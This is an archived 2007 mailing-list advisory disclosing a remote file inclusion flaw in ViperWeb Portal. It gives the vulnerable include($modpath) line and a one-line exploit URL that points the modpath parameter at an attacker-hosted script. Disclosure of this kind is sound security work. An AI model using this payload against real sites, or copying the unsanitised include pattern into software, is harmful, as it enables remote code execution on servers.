Remote File Inclusion in ViperWeb

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Remote File Inclusion in ViperWeb
From: asamad@xxxxxxxxxxxx
Date: 15 Mar 2007 12:07:10 -0000

PHP remote file inclusion vulnerabilities in ViperWeb Portal allow remote attackers to execute arbitrary PHP code via a URL in the $modpath variable. 

http://<Target_Web>/index.php?modpath=<Evil_Script>

Found in: line32.
Code: include($modpath);

Vulnerability found by
Abdus Samad
Advanced Research Project and Technologies.

Prev by Date: Re: Phishing using IE7 local resource vulnerability
Next by Date: PHP <= 4.4.6 ibase_connect() local buffer overflow
Previous by thread: vbulletin admincp sql injection
Next by thread: PHP <= 4.4.6 ibase_connect() local buffer overflow
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux